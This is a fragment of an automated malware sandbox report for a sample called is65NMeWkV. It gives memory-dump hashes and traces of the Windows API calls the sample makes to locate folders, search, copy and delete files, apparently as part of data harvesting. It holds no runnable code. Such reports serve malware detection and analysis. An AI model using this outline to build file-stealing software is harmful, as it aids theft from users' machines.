                                      • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                      • Instruction Fuzzy Hash: 2DF05878980609AEEB28ABE1DC1ABBD767EEF05746F115A1AF502A5190CFB04100CE66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: `o@
                                      • API String ID: 0-590292170
                                      • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                      • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                      • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                      • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                      APIs
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                      • lstrcatA.KERNEL32(?,00881120), ref: 00414C08
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                        • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00882620,?,000003E8), ref: 00414A4A
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                        • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                        • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: UaA
                                      • API String ID: 2104210347-3893042857
                                      • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                      • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                      • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                      • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • GetSystemTime.KERNEL32(?,0087C4D8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SystemTimelstrcpy
                                      • String ID: cI@$cI@
                                      • API String ID: 62757014-1697673767
                                      • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                      • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                      • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                      • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                      APIs
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                      • lstrcatA.KERNEL32(?,008806C8), ref: 004150A8
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                      • String ID: aA
                                      • API String ID: 2699682494-2567749500
                                      • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                      • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                      • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                      • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 0230A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0230A094
                                      • lstrlen.KERNEL32(00000000), ref: 0230BF06
                                        • Part of subcall function 02319097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 023190B9
                                      • StrStrA.SHLWAPI(00000000,004213E0), ref: 0230BF34
                                      • lstrlen.KERNEL32(00000000), ref: 0230C00C
                                      • lstrlen.KERNEL32(00000000), ref: 0230C020
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                      • String ID:
                                      • API String ID: 1440504306-0
                                      • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                      • Instruction ID: 8e5d6a731b1ce68f5fb65d813c27557c5dc2e839c4b91f15a206b1826fc24d43
                                      • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                      • Instruction Fuzzy Hash: EFB12E71911218ABCB2CFBA0DD95EEEB73AAF54306F40456DE506A3090EF346B48CF61
                                      APIs
                                      • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                      • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFileNextlstrcat
                                      • String ID: !=A
                                      • API String ID: 3840410801-2919091325
                                      • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                      • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                      • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                      • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                      APIs
                                        • Part of subcall function 02319047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02319072
                                      • lstrcat.KERNEL32(?,00000000), ref: 023151E1
                                      • lstrcat.KERNEL32(?,00421070), ref: 023151FE
                                      • lstrcat.KERNEL32(?,0064A5F8), ref: 02315212
                                      • lstrcat.KERNEL32(?,00421074), ref: 02315224
                                        • Part of subcall function 02314B77: wsprintfA.USER32 ref: 02314B93
                                        • Part of subcall function 02314B77: FindFirstFileA.KERNEL32(?,?), ref: 02314BAA
                                        • Part of subcall function 02314B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 02314BD8
                                        • Part of subcall function 02314B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 02314BEE
                                        • Part of subcall function 02314B77: FindNextFileA.KERNEL32(000000FF,?), ref: 02314DE4
                                        • Part of subcall function 02314B77: FindClose.KERNEL32(000000FF), ref: 02314DF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                      • Instruction ID: a7e321287b353cf9a20c3ba66cd27039eaf3c544813534524ec6b9ed67e9e56f
                                      • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                      • Instruction Fuzzy Hash: 3121CB7AA402047BC728FBF0DC85EE9337EAB55700F404189B689921C0DE7496C9CFA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID:
                                      • API String ID: 1206339513-0
                                      • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction ID: a0bf94f508eadef944419ed47824c371fa0d11878723af2e6ca55e7156244ae3
                                      • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction Fuzzy Hash: AC01DA79640108FFCB04DFECD998EAE7BBAEF49394F108148F9099B301C635AA50DB95